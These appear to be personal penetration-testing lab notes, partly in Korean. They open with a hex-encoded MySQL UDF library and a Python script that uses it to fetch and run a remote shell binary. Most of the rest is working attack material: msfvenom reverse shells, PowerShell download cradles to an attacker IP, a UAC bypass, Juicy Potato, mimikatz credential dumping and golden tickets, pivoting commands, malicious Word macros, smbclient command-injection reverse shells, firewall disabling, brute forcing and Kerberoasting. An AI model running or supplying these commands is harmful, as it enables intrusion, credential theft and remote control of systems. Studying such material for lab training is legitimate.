fbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000";
shellcode = shellcode_x32
if (platform.architecture()[0] == '64bit'):
shellcode = shellcode_x64
# MySQL username and password: make sure you have FILE privileges and mysql is actually running as root
# username='root'
# password=''
###
#if len(sys.argv) != 2:
# print "Usage: %s <username> <password>" % argv[0]
#username=sys.argv[1];
#password=sys.argv[2];
###
parser = argparse.ArgumentParser()
parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
parser.add_argument('--password', '-p', help='MySQL password', type=str)
args = parser.parse_args()
username=args.username
password=args.password
if not password:
password=''
cmd='mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select @@plugin_dir \G"'
plugin_str = subprocess.check_output(cmd, shell=True)
plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str)
res = bool(plugin_dir)
if not res:
print "Error: could not locate the plugin directory"
plugin_dir_ = plugin_dir.group(1)
print "Plugin dir is %s" % plugin_dir_
# file to save the udf so file to
# alternative way:
# set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir;
print "Trying to create a udf library...";
os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'/home/dev/plugin/udf_sys_exec.so\'"')
udf_outfile = '/home/dev/plugin/udf_sys_exec.so'
udf_filename = 'udf_sys_exec.so'
print "UDF library crated successfully: %s" % udf_outfile;
print "Trying to create sys_exec..."
os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\' \G"' % udf_filename)
print "Checking if sys_exec was crated..."
cmd='mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"'
res = subprocess.check_output(cmd, shell=True)
if (res == ''):
print "sys_exec was not found (good luck next time!)"
if res:
print "sys_exec was found: %s" % res
print "Generating a suid binary in /tmp/sh..."
os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select sys_exec(\'wget http://192.168.119.160/shell.elf\')"')
os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select sys_exec(\'chmod +x ./shell.elf\')"')
os.system('mysql --host=127.0.0.1 --port=13306 -u root -p\'' + password + '\' -e "select sys_exec(\'./shell.elf\')"')
윈도우 침투 후 절차
++++ Simple stuff to find interesting info +++++
c:> dir *.dbx /s (Emails)
c:> findstr /si password *.xml *.ini *.txt (Find passwords)
c:> pwdump/mimikatz (hash/sometimes getting passwd clear text)
c:> netstat -ano (Find other network services on the box, and if another machine on the lab is talking to box you own)
+++ 케이스 1 +++
https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
1. privilege perm 확인
C:\Windows\system32>whoami /priv
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled > PsExec.exe 사용
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
2. 페이로드 만들고 리스너 생성
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.160 LPORT=444 --format exe -o reverse.exe
$ sudo nc -lvnp 444
PsExec.exe 파일 + 페이로드 보내기 ($ sudo python -m SimpleHTTPServer)
c:\Users\Public>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/PsExec.exe', 'c:\Users\Public\Ps.exe')
c:\Users\Public>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/reverse.exe', 'c:\Users\Public\reverse.exe')
3. PsExec.exe 실행 (현재 권한에서 PsExec이 실행 안되는 것을 확인!)
c:\Users\Public>Ps.exe -i -accepteula -d -s reverse.exe
Ps.exe -i -accepteula -d -s reverse.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
The handle is invalid.
Couldn't install PSEXESVC service:
Connecting to local system...
이 같은 경우 UAC (User Account Controller) 보안 컨트롤러가 켜져 있다는 소리.
4. UAC 여부 재확인
c:\Users\Public>reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
ConsentPromptBehaviorAdmin REG_DWORD 0x5 > 이론적으로 5개가 있지만 0,2, 혹은 5로 나뉨
EnableLUA REG_DWORD 0x1 > 1은 UAC가 enabled 되어 있음
PromptOnSecureDesktop REG_DWORD 0x1 > 1은 켜져있음
위 3 가지 확인
5. Bypass UAC
필요한 것 :
- C Exploit (https://github.com/turbo/zero2hero/blob/master/main.c)
- strings64.exe (https://docs.microsoft.com/en-us/sysinternals/downloads/strings)
- eventvwr.exe (윈도우 기본 내장)
eventvwr.exe 찾기
c:\Users\Public>where /r c:\windows eventvwr.exe
where /r c:\windows eventvwr.exe
c:\Windows\System32\eventvwr.exe
c:\Windows\SysWOW64\eventvwr.exe
c:\Windows\WinSxS\amd64_eventviewersettings_31bf3856ad364e35_10.0.14393.0_none_226c43821a65c869\eventvwr.exe
c:\Windows\WinSxS\wow64_eventviewersettings_31bf3856ad364e35_10.0.14393.0_none_2cc0edd44ec68a64\eventvwr.exe
Strings 받은 후 eventvwr 파일이 High integrity로 autoelevate 되어 있는지 확인
c:\Users\Public>strings64.exe -accepteula C:\Windows\System32\eventvwr.exe | findstr /i autoelevate
<autoElevate>true</autoElevate>
확인 되었으면 exploit 내용 일부 수정
/*
GetCurrentDirectory(MAX_PATH, curPath);
strcat(curPath, "\\reverse.exe"); > 이 부분 우리 payload로 바꾸고 주석표시 제거
*/
mingw로 컴파일 후 쉐어
$ x86_64-w64-mingw32-gcc bypass.c -o eventvwr_bypass_64.exe
c:\Users\Public>powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/eventvwr_bypass_64.exe', 'c:\Users\Public\attack.exe')
6. 리스너 실행 후 파일 실행
접속 후
c:> whoami /priv 입력해보면
C:\Windows\system32>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeSecurityPrivilege Manage auditing and security log Disabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Disabled
SeLoadDriverPrivilege Load and unload device drivers Disabled
SeSystemProfilePrivilege Profile system performance Disabled
SeSystemtimePrivilege Change the system time Disabled
SeProfileSingleProcessPrivilege Profile single process Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Disabled
SeCreatePagefilePrivilege Create a pagefile Disabled
SeBackupPrivilege Back up files and directories Disabled
SeRestorePrivilege Restore files and directories Disabled
SeShutdownPrivilege Shut down the system Disabled
SeDebugPrivilege Debug programs Disabled
SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Disabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
SeCreateSymbolicLinkPrivilege Create symbolic links Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
다 튀어나옴.
PsExec / Juicy Potato 모두 사용이 가능한 상황
7. PsExec again (시스템 명령어 c:> psexec.exe -i -s cmd.exe / ps.exe -i -s cmd.exe)
리스너 하나 더 띄우고 명령어 실행
c:\Users\Public>Ps.exe -i -accepteula -d -s c:\Users\Public\reverse.exe
Ps.exe -i -accepteula -d -s c:\Users\Public\reverse.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
Starting c:\Users\Public\reverse.exe on SVCLIENT08...
c:\Users\Public\reverse.exe started on SVCLIENT08 with process ID 172.
리스너에서 받고 확인하면 시스템으로 권한 상승.
$ sudo nc -lvnp 444
listening on [any] 444 ...
connect to [192.168.119.160] from (UNKNOWN) [10.11.1.22] 50431
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami && whoami /priv
whoami && whoami /priv
+++ 케이스2 +++
확인
C:\ windows\system32>whoami /priv
Privilege Name Description State
============================= ==================================== ========
SeAsssignPrimaryTokenPrivi.. Replace a process level token Disabled
SeIncreaseQuotasPrivilege Adjust memory quitas for a process Disabled
SeAuditPrivilege Generate security checking Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authen.. Enabled > JuicyPotato.exe 사용
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
페이로드 만들고 리스너 생성
$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.119.160 LPORT=443 -f exe > reverse.bat
$ sudo nc -lvnp 443
JuicyPotato.exe + 페이로드 파일 보내고 실행 ($ sudo python -m SimpleHTTPServer)
c:> jp.exe -t * -p reverse.bat -l 7997
+++ 다른 도메인 있는 경우 ++++
winPEASany.exe
mimikatz
> privilege::debug
> sekurlsa::logonpasswords
> lsadump::lsa /patch
> sekurlsa::tickets (Extracting kerberos tickets : TGS Ticket Granting Service 확인)
powerview.ps1 +++ Active Directory +++ Enum
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
PS C:\Users\Public> Set-ExecutionPolicy Unrestricted
Set-ExecutionPolicy Unrestricted
PS C:\Users\Public> Get-ExecutionPolicy
Get-ExecutionPolicy
Unrestricted
PS C:\Users\Public> Import-Module .\pv.ps1
PS C:\Users\Public>
> Get-NetDomain
> Get-DomainPolicy
> Get-NetDomainController
> Get-NetDomainController -Domain <DomainName>
> Get-NetComputer -FullData
> Get-UserProperty
> Get-UserProperty -Properties pwdlastset
> Get-NetLoggedon
> Get-NetLoggedon -ComputerName SVCLIENT08
> Get-NetSession -ComputerName SV-DC01
> Get-NetGroupMember
Find-LocalAdminAccess -Verbose
Invoke-EnumerateLocalAdmin -Verbose
Invoke-UserHunter
Invoke-UserHunter -GroupName "RDPUsers"
Invoke-UserHunter -Stealth
Invoke-UserHunter -CheckAccess
+++ crowbar +++++++
$ crowbar -b rdp -s 10.11.1.20/32 -U user.txt -C pass.txt -n 1
$ crowbar -b rdp -s 10.11.1.24/32 -U users.txt -c ThisIsTheUsersPassword01 -n 1
파워쉘 cheatsheet
https://gist.github.com/m8r0wn/b6654989035af20a1cb777b61fbc29bf
++++++++Pivot+++++++
armitage
pth
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.5.5.%i > nul && echo 10.5.5.%i is up.
윈도우 파일전송: powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/
1. windows = plink.exe (SSH를 활용한 Remote port forwarding)
c:> netstat -anpb TCP
c:> plink.exe -ssh -l kali -pw ilak -R 192.168.119.160:1234:127.0.0.1:49882 192.168.119.160
c:> cmd.exe /c echo y | plink.exe -ssh -l kali -pw ilak -R 10.11.0.4:1234:127.0.0.1:3306 10.11.0.4
=> 칼리로 접속됨.
$ sudo nmap -sS -sV 127.0.0.1 -p 1234
1-1 netsh CMD (내부망 다른 서버의 TCP 445) ******* smbclient 접속 되어야 함 ***********
c:> netsh interface portproxy add v4tov4 listenport=4455 listenaddress=10.11.0.22 connectport=445 connectaddress=192.168.1.110
c:> netstat -anp TCP | find "4455"
c:> netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.11.0.22 localport=4455 action=allow
$ sudo nano /etc/samba/smb.conf' => min protocol = SMB2 인지 확인
$ sudo /etc/init.d/smbd restart
$ smbclient -L 10.11.1.22 --port=4455 --user=Administrator (share 자원 있는지 확인)
$ sudo mkdir /mnt/win10_share
$ sudo mount -t cifs -o port=4455 //10.11.1.22/Data -o username=Administrator,password=Qwerty09! /mnt/win10_share
$ ls -l /mnt/win10_share/
$ cat /mnt/win10_share/data.txt
word 파일 페이로드
Exploiting HTML Applications
payload doc file로 만들기
0. 파일생성
msfconsole > use exploit/multi/fileformat/ofiice_word_macro
1. payload
format vba-psh / hta-psh
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.160 LPORT=80 --format hta-psh > shell.hta
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 --format vba-psh > shell.doc
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.119.160 LPORT=443 --platform windows --smallest StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 -f c > evil.doc
사용 예)
Sub AutoOpen()
MyMacro
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub MyMacro()
Dim Str As String
"0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByA"
Str = Str + "HUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACc"
Str = Str + "ASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4Ab"
Str = Str + "wBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB"
Str = Str + "5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQA"
Str = Str + "HIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADs"
Str = Str + "A"
CreateObject("Wscript.Shell").Run Str
End Sub
Kerberos
- 설치 절차 -
1. go 설치
https://golang.org/doc/install
> 다운 받고 압축 풀고 환경변수 등록
# rm -rf /usr/local/go && tar -C /usr/local -xzf go1.16.4.linux-amd64.tar.gz
# export PATH=$PATH:/usr/local/go/bin
# echo $PATH
# go version
2. kerbrute 설치
https://github.com/ropnop/kerbrute/releases/tag/v1.0.3 > Source code 받고 압축푼뒤
# unzip kerbrute-1.0.3.zip
# cd kerbrute-1.0.3
# make help
# make all
# cd dist
3. 명령어 실행
userenum
# ./kerbrute_linux_amd64 userenum --domain svcorp.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.11.1.20
ID:pass 찾기
# ./kerbrute_linux_amd64 bruteuser --domain svcorp.com /usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt users.txt --dc 10.11.1.20
Active Directory
https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet
+++++++++++++++ Net.exe로 검색 ++++++++++++++++++
1. Enumerate all local accounts by using ‘net user’ sub-command
C:\>net user
2. Enumerate all users and all groupd in the entire domain.
C:\>net user /domain
C:\>net group /domain
3. Query users to find who is in Domain Admins group
C:\>net user ralph /domain
+++++++++++++++++ Powershell로 검색 ++++++++++++++++++++++++
LDAP = 'Lightweight Directory Access Protocol' is an Active Direvtory Service Interfaces (ADSI) provider.
DN = DistinguishedName
DC = Domain Components
1. Discover hostname of the domain controller and the components of the DistinguishedName.
PS C:\> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
2. Enumerate all users
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="samAccountType=805306368"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
Write-Host "------------------------"
}
3. Enumerate domain groups
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(objectClass=Group)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
$obj.Properties.name
}
4. Enumerate group members
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="(name=Domain Admins)"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
$obj.Properties.member
}
5. Detect Service principal names
$domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$PDC = ($domainObj.PdcRoleOwner).Name
$SearchString = "LDAP://"
$SearchString += $PDC + "/"
$DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
$SearchString += $DistinguishedName
$Searcher = New-Object System.DirectoryServices.DirectorySearcher([ADSI]$SearchString)
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$Searcher.SearchRoot = $objDomain
$Searcher.filter="serviceprincipalname=*http*"
$Result = $Searcher.FindAll()
Foreach($obj in $Result)
{
Foreach($prop in $obj.Properties)
{
$prop
}
}
nslookup founded_servicePrincipalName
6. mimikatz (https://tggg23.tistory.com/36)
# privilege::debug
# sekurlsa::logonpasswords
password가 null로 나오는 경우
regedit > HKEY_LOCAL_MACHINE > SYSTEM > currentControlset / Control > Securityproviders >
WDigest > 새로 만들기 (DWORD - UseLogonCredential - 값이 0으로 되어 있다면 1로 바꾸기)
# sekurlsa::pth /user:Administrator /domain:SVCLIENT08 /ntlm:ee0c207898a5bccc01f38
# token::elevate
# token::list
# lsadump::sam
# lsadump::secrets
# sekurlsa::tickets
# kerberos::golden /user:alice /domain:svcorp.com /sid:S-1-5-21-466546139-763938477-1796994327-1103 /target:HP3service.svcorp.com /service:HTTP
7. winpeas 로 IP랑 비번 찾기 https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/mimikatz.exe', 'c:\Users\Public\mimi.exe')
powershell.exe (New-Object System.Net.WebClient).DownloadFile('http://192.168.119.160:8000/winPEASany.exe', 'c:\Users\Public\winp.exe')
or user in $(cat users.txt); do c*****r -b *** -s IP -u $user -C /passwords.txt -n 1; done
UAC(User account control) bypass (p540)
psexec form impacket
LDAP 385
SMB 445
RDP 3389
smbclient
$ smbclient --list //10.11.1.136/ -U ""
$ smbclient //10.11.1.136/'Bob Share'/ -U ""
$ smbclient //10.11.1.136/'Bob share' --option='client min protocol=NT1' -U "./= nohub nc -e /bin/sh 192.168.119.160 443"
$ smbclient //10.11.1.136/'Bob share' -U "/=`nohup mkfifo /tmp/f; nc 192.168.119.160 443 0</tmp/f | /bin/sh >/tmp/f 2>&1; rm /tmp/f` "
smb version check
$ sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]'
$ smbclient -L //10.11.1.146/SusieShare -U ""
https://hackmag.com/security/htb-kerberos/
$ hydra -L users.txt -P passs.txt smb://10.11.1.21 -t 4
$ hydra -L username.txt -P password.txt 10.11.1.21 smb -V
$ sudo nmap -n --script safe -p 445 10.11.1.21
$ rdesktop -u SVCORP\\USERNAME -p PASSWORD 10.11.1.20
$ crowbar -b rdp -S server.txt -U users.txt -C passs.txt -n 1
Banner Grab
탭1
$ sudo ngrep -i -d tun0 's.?a.?m.?b.?a.*[[:digit:]]' port 139
탭2
$ smbclient -L \\10.11.1.115
$ sudo smbmap -H 10.11.1.115 -P 139
$ smbclient -N -L 10.11.1.11
$ smbclient -N "\\10.11.1.11\file"
smb:> dir
smb:> recurse ON
smb:> prompt OFF
smb:> mget *
++++++++++ 윈도우 SMB +++++++++++++++++++++++++
$ sudo smbmap -u anonymous -p password -d -H 10.11.1.31 > 공유 목록 및 권한 확인
$ smbclient \\\\10.11.1.20\\Public password
$ smbclient \\\\10.11.1.31\\wwwroot password > smb 접속 가능
++++++++ mssql 접근 방법 +++++++++++++++++++
$ /home/OS-94404/.local/bin/mssqlclient.py -p 1433 sa@10.11.1.31 -windows-auth
$ /home/OS-94404/.local/bin/mssqlclient.py RALPH\ralph:poiuytrewq@10.11.1.31 -windows-auth
(https://alamot.github.io/mssql_shell/)
$ sqsh
sql CMD 모음
https://www.sqlshack.com/working-sql-server-command-line-sqlcmd/
윈도우 쓰기 권한 폴더 생성
fsutl 사용법
https://www.windows-commandline.com/create-empty-file/
batat.exe
service_exec(conn, r'cmd /c net user OS-94404 pass /add')
service_exec(conn, r'cmd /c net localgroup administrators OS-94404 /add')
service_exec(conn, r'cmd /c netsh firewall set opmode disable')
service_exec(conn, r'cmd /c netsh advfirewall set allprofiles off')
smb_send_file(smbConn, '/home/OS-94404/labs/75/shell.exe', 'C', '/shell.exe')
service_exec(conn, r'cmd /c c:\shell.exe')
ldap enum
# nmap -sT -Pn -n --open 192.168.73.20 -p389 --script ldap-rootdse
jquery file upload 취약점
$ curl -F "files=@reverse.php" http://10.11.1.123/books/apps/jquery-file-upload/server/php/index.php
Kerberoasting Attack Synopsis
1. Scan AD for user accounts with SPN values set
2. Once a list of target accounts is obtained, requests service tickets from AD using SPN values.
3. Using Mimikatz, extracts the service tickets to memory and saves the information to a file
4. Once the tickets are saved to disk, passes them into a password cracking script that will run a dictionary of passwords as NTLM hashes against the service tickets they have extracted until it can successfully open the ticket. When the file ticket is finally opened, the service account password will be presented to me in clear text.
방법 1)
1) Get Users with SPNs
GetUserSPNs.ps1
2) Get Service Tickets (nmap에서 NetBIOS-Computer-name 확인해서 어떤 서버의 티켓을 추출하는지 확인할것)
ps> Add-Type -AssemblyName System.IdentityModel
ps> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQL....."
3) Extract Tickets
mimikatz # kerberos::list /export
4) Crack Tickets
binary 파일이라 전송에 주의하고
